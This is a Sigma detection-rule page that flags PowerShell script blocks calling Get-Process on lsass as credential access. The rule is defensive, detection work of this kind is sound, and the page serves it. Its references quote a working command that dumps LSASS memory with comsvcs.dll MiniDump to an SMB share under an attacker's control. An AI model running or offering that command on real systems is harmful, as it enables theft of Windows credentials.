PowerShell Get-Process LSASS in ScriptBlock
Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
Sigma rule (View on GitHub)
1title: PowerShell Get-Process LSASS in ScriptBlock
2id: 84c174ab-d3ef-481f-9c86-a50d0b8e3edb
3status: test
4description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
5references:
6 - https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
7author: Florian Roth (Nextron Systems)
8date: 2021-04-23
9modified: 2022-12-25
10tags:
11 - attack.credential-access
12 - attack.t1003.001
13logsource:
14 product: windows
15 category: ps_script
16 definition: 'Requirements: Script Block Logging must be enabled'
17detection:
18 selection:
19 ScriptBlockText|contains: 'Get-Process lsass'
20 condition: selection
21falsepositives:
22 - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)
23level: high
References
-
“Remote LSASS dump without touching local disk? Yes :) On target run: 1) net use x: \\smbserver_under_your_control\c$\ 2) powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lassdump.bin full”
Read More
Related rules
- APT31 Judgement Panda Activity
- Cred Dump Tools Dropped Files
- Credential Dumping Activity By Python Based Tool
- Credential Dumping Attempt Via WerFault
- Credential Dumping Tools Service Execution - Security